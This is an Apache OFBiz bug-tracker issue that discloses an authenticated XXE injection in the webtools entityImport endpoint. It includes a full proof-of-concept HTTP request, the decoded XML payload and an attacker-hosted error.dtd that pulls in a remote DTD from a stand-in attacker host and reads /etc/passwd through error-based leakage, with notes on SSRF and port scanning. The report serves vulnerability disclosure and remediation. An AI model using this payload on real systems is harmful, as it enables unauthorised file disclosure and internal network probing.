Uploaded image for project: 'OFBiz'
  1. OFBiz
  2. OFBIZ-1525 Issue to group security concerns
  3. OFBIZ-11195

XML Entity Injection in webtools/control/entityImport

    XMLWordPrintableJSON

Details

    • Bug Crush Event - 21/2/2015

    Description

      This was reported to the OFBiz security team by Jason Nordenstam from offensive-security.com. We did not consider it as a real security issue because it requires authentication.

      Authenticated users can import XML documents containing DTDs. The SAX parser used by the XML Data Import functionality does not have DTD parsing explicitly disabled which makes it vulnerable to XXE attacks.

      The results of the import are not displayed in the page which means an 'error-based' approach is needed to read local files. The parser will also resolve external entities so this vulnerability can also be used for internal port scanning or server-side request forgery.
      Affected URL:
      /webtools/control/entityImport

      POC Example Request:
      POST /webtools/control/entityImport HTTP/1.1
      Host:<host>
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: <host>/webtools/control/entityImport
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 312
      Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
      Connection: close
      Upgrade-Insecure-Requests: 1

      fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A

      Payload One Decoded:
      <?xml version="1.0" encoding="utf-8"?>
      <!DOCTYPE notfound [
      <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
      %base;
      %param1;
      %external;
      ]>
      <root><foo>bar</bar></root>

      error.dtd on Attacking Machine:
      <!ENTITY % payload SYSTEM "file:///etc/passwd">
      <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >

      We have reproduced it at https://demo-stable.ofbiz.apache.org/webtools/control/entityImport
      using :

      <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE notfound [
 <!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd">
 %base;
 %param1;
 %external;
 ]>
 <root><foo>bar</bar></root>

      Attachments

        Issue Links

          depends upon

          Sub-task - The sub-task of the issue OFBIZ-11306 POC for CSRF Token (CVE-2019-0235)

          • Minor - Minor loss of function, or other problem where easy workaround is present.
          • Closed

          Activity

            People

              jleroux Jacques Le Roux
              jleroux Jacques Le Roux
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: